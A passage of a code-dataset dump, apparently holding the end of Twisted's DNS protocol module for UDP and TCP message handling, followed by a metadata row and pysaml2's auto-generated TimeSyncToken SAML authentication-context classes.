# invoking a lot of different decoding methods, we might as well
# be extra cautious. Anything that triggers this is itself
# buggy.
log.err(failure.Failure(), "Unexpected decoding error")
return
if m.id in self.liveMessages:
d, canceller = self.liveMessages[m.id]
del self.liveMessages[m.id]
canceller.cancel()
# XXX we shouldn't need this hack of catching exception on callback()
try:
d.callback(m)
except:
log.err()
else:
if m.id not in self.resends:
self.controller.messageReceived(m, self, addr)
def removeResend(self, id):
"""
Mark message ID as no longer having duplication suppression.
"""
try:
del self.resends[id]
except KeyError:
pass
def query(self, address, queries, timeout=10, id=None):
"""
Send out a message with the given queries.
@type address: C{tuple} of C{str} and C{int}
@param address: The address to which to send the query
@type queries: C{list} of C{Query} instances
@param queries: The queries to transmit
@rtype: C{Deferred}
"""
if not self.transport:
# XXX transport might not get created automatically, use callLater?
try:
self.startListening()
except CannotListenError:
return defer.fail()
if id is None:
id = self.pickID()
else:
self.resends[id] = 1
def writeMessage(m):
self.writeMessage(m, address)
return self._query(queries, timeout, id, writeMessage)
class DNSProtocol(DNSMixin, protocol.Protocol):
"""
DNS protocol over TCP.
"""
length = None
buffer = ''
def writeMessage(self, message):
"""
Send a message holding DNS queries.
@type message: L{Message}
"""
s = message.toStr()
self.transport.write(struct.pack('!H', len(s)) + s)
def connectionMade(self):
"""
Connection is made: reset internal state, and notify the controller.
"""
self.liveMessages = {}
self.controller.connectionMade(self)
def connectionLost(self, reason):
"""
Notify the controller that this protocol is no longer
connected.
"""
self.controller.connectionLost(self)
def dataReceived(self, data):
self.buffer += data
while self.buffer:
if self.length is None and len(self.buffer) >= 2:
self.length = struct.unpack('!H', self.buffer[:2])[0]
self.buffer = self.buffer[2:]
if len(self.buffer) >= self.length:
myChunk = self.buffer[:self.length]
m = Message()
m.fromStr(myChunk)
try:
d, canceller = self.liveMessages[m.id]
except KeyError:
self.controller.messageReceived(m, self)
else:
del self.liveMessages[m.id]
canceller.cancel()
# XXX we shouldn't need this hack
try:
d.callback(m)
except:
log.err()
self.buffer = self.buffer[self.length:]
self.length = None
else:
break
def query(self, queries, timeout=60):
"""
Send out a message with the given queries.
@type queries: C{list} of C{Query} instances
@param queries: The queries to transmit
@rtype: C{Deferred}
"""
id = self.pickID()
return self._query(queries, timeout, id, self.writeMessage)
| apache-2.0 |
fangxingli/hue | desktop/core/ext-py/pysaml2-2.4.0/src/saml2/authn_context/timesync.py | 37 | 107827 | #!/usr/bin/env python
#
# Generated Thu May 16 21:05:38 2013 by parse_xsd.py version 0.5.
#
import saml2
from saml2 import SamlBase
NAMESPACE = 'urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken'
class PhysicalVerification(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
PhysicalVerification element """
c_tag = 'PhysicalVerification'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['credentialLevel'] = ('credential_level', 'None', False)
def __init__(self,
credential_level=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.credential_level = credential_level
def physical_verification_from_string(xml_string):
return saml2.create_class_from_xml_string(PhysicalVerification, xml_string)
class Generation(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Generation
element """
c_tag = 'Generation'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['mechanism'] = ('mechanism', 'None', True)
def __init__(self,
mechanism=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.mechanism = mechanism
def generation_from_string(xml_string):
return saml2.create_class_from_xml_string(Generation, xml_string)
class NymType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:nymType
element """
c_tag = 'nymType'
c_namespace = NAMESPACE
c_value_type = {'base': 'xs:NMTOKEN',
'enumeration': ['anonymity', 'verinymity', 'pseudonymity']}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def nym_type__from_string(xml_string):
return saml2.create_class_from_xml_string(NymType_, xml_string)
class GoverningAgreementRefType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
GoverningAgreementRefType element """
c_tag = 'GoverningAgreementRefType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['governingAgreementRef'] = (
'governing_agreement_ref', 'anyURI', True)
def __init__(self,
governing_agreement_ref=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.governing_agreement_ref = governing_agreement_ref
def governing_agreement_ref_type__from_string(xml_string):
return saml2.create_class_from_xml_string(GoverningAgreementRefType_,
xml_string)
class KeySharingType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:KeySharingType
element """
c_tag = 'KeySharingType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['sharing'] = ('sharing', 'boolean', True)
def __init__(self,
sharing=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.sharing = sharing
def key_sharing_type__from_string(xml_string):
return saml2.create_class_from_xml_string(KeySharingType_, xml_string)
class RestrictedLengthType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
RestrictedLengthType element """
c_tag = 'RestrictedLengthType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['min'] = ('min', 'None', True)
c_attributes['max'] = ('max', 'integer', False)
def __init__(self,
min=None,
max=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.min = min
self.max = max
def restricted_length_type__from_string(xml_string):
return saml2.create_class_from_xml_string(RestrictedLengthType_, xml_string)
class AlphabetType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AlphabetType
element """
c_tag = 'AlphabetType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['requiredChars'] = ('required_chars', 'string', True)
c_attributes['excludedChars'] = ('excluded_chars', 'string', False)
c_attributes['case'] = ('case', 'string', False)
def __init__(self,
required_chars=None,
excluded_chars=None,
case=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.required_chars = required_chars
self.excluded_chars = excluded_chars
self.case = case
def alphabet_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AlphabetType_, xml_string)
class DeviceTypeType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:DeviceTypeType
element """
c_tag = 'DeviceTypeType'
c_namespace = NAMESPACE
c_value_type = {'base': 'xs:NMTOKEN',
'enumeration': ['hardware', 'software']}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def device_type_type__from_string(xml_string):
return saml2.create_class_from_xml_string(DeviceTypeType_, xml_string)
class BooleanType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:booleanType
element """
c_tag = 'booleanType'
c_namespace = NAMESPACE
c_value_type = {'base': 'xs:NMTOKEN', 'enumeration': ['true', 'false']}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def boolean_type__from_string(xml_string):
return saml2.create_class_from_xml_string(BooleanType_, xml_string)
class ActivationLimitDurationType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
ActivationLimitDurationType element """
c_tag = 'ActivationLimitDurationType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['duration'] = ('duration', 'duration', True)
def __init__(self,
duration=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.duration = duration
def activation_limit_duration_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ActivationLimitDurationType_,
xml_string)
class ActivationLimitUsagesType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
ActivationLimitUsagesType element """
c_tag = 'ActivationLimitUsagesType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['number'] = ('number', 'integer', True)
def __init__(self,
number=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.number = number
def activation_limit_usages_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ActivationLimitUsagesType_,
xml_string)
class ActivationLimitSessionType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
ActivationLimitSessionType element """
c_tag = 'ActivationLimitSessionType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def activation_limit_session_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ActivationLimitSessionType_,
xml_string)
class LengthType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:LengthType
element """
c_tag = 'LengthType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['min'] = ('min', 'integer', True)
c_attributes['max'] = ('max', 'integer', False)
def __init__(self,
min=None,
max=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.min = min
self.max = max
def length_type__from_string(xml_string):
return saml2.create_class_from_xml_string(LengthType_, xml_string)
class MediumType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:mediumType
element """
c_tag = 'mediumType'
c_namespace = NAMESPACE
c_value_type = {'base': 'xs:NMTOKEN',
'enumeration': ['memory', 'smartcard', 'token',
'MobileDevice', 'MobileAuthCard']}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def medium_type__from_string(xml_string):
return saml2.create_class_from_xml_string(MediumType_, xml_string)
class KeyStorageType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:KeyStorageType
element """
c_tag = 'KeyStorageType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['medium'] = ('medium', MediumType_, True)
def __init__(self,
medium=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.medium = medium
def key_storage_type__from_string(xml_string):
return saml2.create_class_from_xml_string(KeyStorageType_, xml_string)
class ExtensionType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ExtensionType
element """
c_tag = 'ExtensionType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def extension_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ExtensionType_, xml_string)
class TimeSyncTokenType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
TimeSyncTokenType element """
c_tag = 'TimeSyncTokenType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['DeviceType'] = ('device_type', 'None', True)
c_attributes['SeedLength'] = ('seed_length', 'None', True)
c_attributes['DeviceInHand'] = ('device_in_hand', 'None', True)
def __init__(self,
device_type=None,
seed_length=None,
device_in_hand=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.device_type = device_type
self.seed_length = seed_length
self.device_in_hand = device_in_hand
def time_sync_token_type__from_string(xml_string):
return saml2.create_class_from_xml_string(TimeSyncTokenType_, xml_string)
class KeySharing(KeySharingType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:KeySharing
element """
c_tag = 'KeySharing'
c_namespace = NAMESPACE
c_children = KeySharingType_.c_children.copy()
c_attributes = KeySharingType_.c_attributes.copy()
c_child_order = KeySharingType_.c_child_order[:]
c_cardinality = KeySharingType_.c_cardinality.copy()
def key_sharing_from_string(xml_string):
return saml2.create_class_from_xml_string(KeySharing, xml_string)
class KeyStorage(KeyStorageType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:KeyStorage
element """
c_tag = 'KeyStorage'
c_namespace = NAMESPACE
c_children = KeyStorageType_.c_children.copy()
c_attributes = KeyStorageType_.c_attributes.copy()
c_child_order = KeyStorageType_.c_child_order[:]
c_cardinality = KeyStorageType_.c_cardinality.copy()
def key_storage_from_string(xml_string):
return saml2.create_class_from_xml_string(KeyStorage, xml_string)
class TimeSyncToken(TimeSyncTokenType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:TimeSyncToken
element """
c_tag = 'TimeSyncToken'
c_namespace = NAMESPACE
c_children = TimeSyncTokenType_.c_children.copy()
c_attributes = TimeSyncTokenType_.c_attributes.copy()
c_child_order = TimeSyncTokenType_.c_child_order[:]
c_cardinality = TimeSyncTokenType_.c_cardinality.copy()
def time_sync_token_from_string(xml_string):
return saml2.create_class_from_xml_string(TimeSyncToken, xml_string)
class Length(LengthType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Length element """
c_tag = 'Length'
c_namespace = NAMESPACE
c_children = LengthType_.c_children.copy()
c_attributes = LengthType_.c_attributes.copy()
c_child_order = LengthType_.c_child_order[:]
c_cardinality = LengthType_.c_cardinality.copy()
def length_from_string(xml_string):
return saml2.create_class_from_xml_string(Length, xml_string)
class GoverningAgreementRef(GoverningAgreementRefType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:GoverningAgreementRef element """
c_tag = 'GoverningAgreementRef'
c_namespace = NAMESPACE
c_children = GoverningAgreementRefType_.c_children.copy()
c_attributes = GoverningAgreementRefType_.c_attributes.copy()
c_child_order = GoverningAgreementRefType_.c_child_order[:]
c_cardinality = GoverningAgreementRefType_.c_cardinality.copy()
def governing_agreement_ref_from_string(xml_string):
return saml2.create_class_from_xml_string(GoverningAgreementRef, xml_string)
class GoverningAgreementsType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
GoverningAgreementsType element """
c_tag = 'GoverningAgreementsType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}GoverningAgreementRef'] = (
'governing_agreement_ref', [GoverningAgreementRef])
c_cardinality['governing_agreement_ref'] = {"min": 1}
c_child_order.extend(['governing_agreement_ref'])
def __init__(self,
governing_agreement_ref=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.governing_agreement_ref = governing_agreement_ref or []
def governing_agreements_type__from_string(xml_string):
return saml2.create_class_from_xml_string(GoverningAgreementsType_,
xml_string)
class RestrictedPasswordType_Length(RestrictedLengthType_):
c_tag = 'Length'
c_namespace = NAMESPACE
c_children = RestrictedLengthType_.c_children.copy()
c_attributes = RestrictedLengthType_.c_attributes.copy()
c_child_order = RestrictedLengthType_.c_child_order[:]
c_cardinality = RestrictedLengthType_.c_cardinality.copy()
def restricted_password_type__length_from_string(xml_string):
return saml2.create_class_from_xml_string(RestrictedPasswordType_Length,
xml_string)
class Alphabet(AlphabetType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Alphabet element """
c_tag = 'Alphabet'
c_namespace = NAMESPACE
c_children = AlphabetType_.c_children.copy()
c_attributes = AlphabetType_.c_attributes.copy()
c_child_order = AlphabetType_.c_child_order[:]
c_cardinality = AlphabetType_.c_cardinality.copy()
def alphabet_from_string(xml_string):
return saml2.create_class_from_xml_string(Alphabet, xml_string)
class ActivationLimitDuration(ActivationLimitDurationType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationLimitDuration element """
c_tag = 'ActivationLimitDuration'
c_namespace = NAMESPACE
c_children = ActivationLimitDurationType_.c_children.copy()
c_attributes = ActivationLimitDurationType_.c_attributes.copy()
c_child_order = ActivationLimitDurationType_.c_child_order[:]
c_cardinality = ActivationLimitDurationType_.c_cardinality.copy()
def activation_limit_duration_from_string(xml_string):
return saml2.create_class_from_xml_string(ActivationLimitDuration,
xml_string)
class ActivationLimitUsages(ActivationLimitUsagesType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationLimitUsages element """
c_tag = 'ActivationLimitUsages'
c_namespace = NAMESPACE
c_children = ActivationLimitUsagesType_.c_children.copy()
c_attributes = ActivationLimitUsagesType_.c_attributes.copy()
c_child_order = ActivationLimitUsagesType_.c_child_order[:]
c_cardinality = ActivationLimitUsagesType_.c_cardinality.copy()
def activation_limit_usages_from_string(xml_string):
return saml2.create_class_from_xml_string(ActivationLimitUsages, xml_string)
class ActivationLimitSession(ActivationLimitSessionType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationLimitSession element """
c_tag = 'ActivationLimitSession'
c_namespace = NAMESPACE
c_children = ActivationLimitSessionType_.c_children.copy()
c_attributes = ActivationLimitSessionType_.c_attributes.copy()
c_child_order = ActivationLimitSessionType_.c_child_order[:]
c_cardinality = ActivationLimitSessionType_.c_cardinality.copy()
def activation_limit_session_from_string(xml_string):
return saml2.create_class_from_xml_string(ActivationLimitSession,
xml_string)
class Extension(ExtensionType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Extension element """
c_tag = 'Extension'
c_namespace = NAMESPACE
c_children = ExtensionType_.c_children.copy()
c_attributes = ExtensionType_.c_attributes.copy()
c_child_order = ExtensionType_.c_child_order[:]
c_cardinality = ExtensionType_.c_cardinality.copy()
def extension_from_string(xml_string):
return saml2.create_class_from_xml_string(Extension, xml_string)
class TokenType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:TokenType element """
c_tag = 'TokenType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}TimeSyncToken'] = (
'time_sync_token', TimeSyncToken)
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_child_order.extend(['time_sync_token', 'extension'])
def __init__(self,
time_sync_token=None,
extension=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.time_sync_token = time_sync_token
self.extension = extension or []
def token_type__from_string(xml_string):
return saml2.create_class_from_xml_string(TokenType_, xml_string)
class Token(TokenType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Token element """
c_tag = 'Token'
c_namespace = NAMESPACE
c_children = TokenType_.c_children.copy()
c_attributes = TokenType_.c_attributes.copy()
c_child_order = TokenType_.c_child_order[:]
c_cardinality = TokenType_.c_cardinality.copy()
def token_from_string(xml_string):
return saml2.create_class_from_xml_string(Token, xml_string)
class SharedSecretChallengeResponseType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SharedSecretChallengeResponseType element """
c_tag = 'SharedSecretChallengeResponseType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_attributes['method'] = ('method', 'anyURI', False)
c_child_order.extend(['extension'])
def __init__(self,
extension=None,
method=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.extension = extension or []
self.method = method
def shared_secret_challenge_response_type__from_string(xml_string):
return saml2.create_class_from_xml_string(
SharedSecretChallengeResponseType_, xml_string)
class PublicKeyType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PublicKeyType element """
c_tag = 'PublicKeyType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_attributes['keyValidation'] = ('key_validation', 'None', False)
c_child_order.extend(['extension'])
def __init__(self,
extension=None,
key_validation=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.extension = extension or []
self.key_validation = key_validation
def public_key_type__from_string(xml_string):
return saml2.create_class_from_xml_string(PublicKeyType_, xml_string)
class GoverningAgreements(GoverningAgreementsType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:GoverningAgreements element """
c_tag = 'GoverningAgreements'
c_namespace = NAMESPACE
c_children = GoverningAgreementsType_.c_children.copy()
c_attributes = GoverningAgreementsType_.c_attributes.copy()
c_child_order = GoverningAgreementsType_.c_child_order[:]
c_cardinality = GoverningAgreementsType_.c_cardinality.copy()
def governing_agreements_from_string(xml_string):
return saml2.create_class_from_xml_string(GoverningAgreements, xml_string)
class PasswordType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PasswordType element """
c_tag = 'PasswordType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Length'] = (
'length', Length)
c_cardinality['length'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Alphabet'] = (
'alphabet', Alphabet)
c_cardinality['alphabet'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Generation'] = (
'generation', Generation)
c_cardinality['generation'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_attributes['ExternalVerification'] = (
'external_verification', 'anyURI', False)
c_child_order.extend(['length', 'alphabet', 'generation', 'extension'])
def __init__(self,
length=None,
alphabet=None,
generation=None,
extension=None,
external_verification=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.length = length
self.alphabet = alphabet
self.generation = generation
self.extension = extension or []
self.external_verification = external_verification
def password_type__from_string(xml_string):
return saml2.create_class_from_xml_string(PasswordType_, xml_string)
class RestrictedPasswordType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:RestrictedPasswordType element """
c_tag = 'RestrictedPasswordType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Length'] = (
'length', RestrictedPasswordType_Length)
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Generation'] = (
'generation', Generation)
c_cardinality['generation'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_attributes['ExternalVerification'] = (
'external_verification', 'anyURI', False)
c_child_order.extend(['length', 'generation', 'extension'])
def __init__(self,
length=None,
generation=None,
extension=None,
external_verification=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.length = length
self.generation = generation
self.extension = extension or []
self.external_verification = external_verification
def restricted_password_type__from_string(xml_string):
return saml2.create_class_from_xml_string(RestrictedPasswordType_,
xml_string)
class ActivationLimitType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationLimitType element """
c_tag = 'ActivationLimitType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ActivationLimitDuration'] = (
'activation_limit_duration', ActivationLimitDuration)
c_cardinality['activation_limit_duration'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ActivationLimitUsages'] = (
'activation_limit_usages', ActivationLimitUsages)
c_cardinality['activation_limit_usages'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ActivationLimitSession'] = (
'activation_limit_session', ActivationLimitSession)
c_cardinality['activation_limit_session'] = {"min": 0, "max": 1}
c_child_order.extend(
['activation_limit_duration', 'activation_limit_usages',
'activation_limit_session'])
def __init__(self,
activation_limit_duration=None,
activation_limit_usages=None,
activation_limit_session=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.activation_limit_duration = activation_limit_duration
self.activation_limit_usages = activation_limit_usages
self.activation_limit_session = activation_limit_session
def activation_limit_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ActivationLimitType_, xml_string)
class ExtensionOnlyType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ExtensionOnlyType element """
c_tag = 'ExtensionOnlyType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_child_order.extend(['extension'])
def __init__(self,
extension=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.extension = extension or []
def extension_only_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ExtensionOnlyType_, xml_string)
class PrincipalAuthenticationMechanismType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PrincipalAuthenticationMechanismType element """
c_tag = 'PrincipalAuthenticationMechanismType'
c_namespace = NAMESPACE
